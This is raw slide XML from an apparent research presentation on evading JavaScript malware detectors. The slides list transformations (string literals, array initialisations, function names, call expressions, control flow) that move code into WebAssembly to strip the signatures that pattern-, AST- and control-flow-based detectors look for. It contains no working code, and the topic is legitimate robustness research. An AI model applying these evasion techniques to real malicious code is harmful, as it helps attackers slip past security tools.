        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="126986" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>T1-StringLiteral</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T2-ArrayInitialization</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T3-FunctionName</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="126986" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>T4-CallExpression (a)</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T4-CallExpression (b)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="126986" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>T5-IfStatement</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T6-ForStatement</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="126986" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>T7-WhileStatement</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="126986" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="Google Shape;425;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17</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="426" name="Google Shape;426;p42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2032000"/>
            <a:ext cx="2926080" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="427" name="Google Shape;427;p42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3302000"/>
            <a:ext cx="2926080" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Google Shape;428;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="1201756"/>
            <a:ext cx="4749964" cy="77944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0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> to remove lexical signatures expected by pattern-based detectors</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="Google Shape;429;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2282233"/>
            <a:ext cx="4749964" cy="77944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0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>function calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>to modify the calling context used by AST-based detectors</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Google Shape;430;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="3508504"/>
            <a:ext cx="464213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C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>control flows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> to remove control-flow information used by detectors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311700" y="182880"/>
            <a:ext cx="8520600" cy="738325"/>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T1-StringLiteral Transformation</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Google Shape;436;p43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860399" y="1085884"/>
            <a:ext cx="8160759" cy="830997"/>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 sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Intuition: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>remove string signatures expected by detectors</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="Google Shape;437;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2441133" y="3804927"/>
            <a:ext cx="3526800" cy="646500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="11430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Move string literal into the data sections of WebAssembly</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="Google Shape;438;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sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="Google Shape;439;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3181618" y="1839961"/>
            <a:ext cx="199981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1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none" baseline="-25000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>T1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none" baseline="-25000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>T1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none" baseline="-25000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>T1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Google Shape;440;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671542" y="2856997"/>
            <a:ext cx="1950953" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="11430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Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>Literal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> nodes with string values</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="Google Shape;441;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5695805" y="2852564"/>
            <a:ext cx="3081161"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Excludes strings used in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>require</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> statements</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="442" name="Google Shape;442;p43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4132365" y="2407210"/>
            <a:ext cx="0" cy="1369053"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="443" name="Google Shape;443;p43"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="440" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2622495" y="2407063"/>
            <a:ext cx="848700" cy="773100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="444" name="Google Shape;444;p43"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="441" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4750505" y="2409230"/>
            <a:ext cx="945300" cy="766500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>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9"/>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443"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="9" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="44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4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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="182880"/>
            <a:ext cx="8520600" cy="738325"/>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T4-CallExpression(a) Transformation</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="Google Shape;450;p44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860399" y="1085884"/>
            <a:ext cx="8160759" cy="830997"/>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 sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Intuition: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>modify calling context used by AST-based detectors </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="Google Shape;451;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2441133" y="3804927"/>
            <a:ext cx="3526897" cy="618631"/>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Convert general function calls into WebAssembly export functions</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="452" name="Google Shape;452;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19</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="Google Shape;453;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3181618" y="1839961"/>
            <a:ext cx="199981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1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>L</a:t>
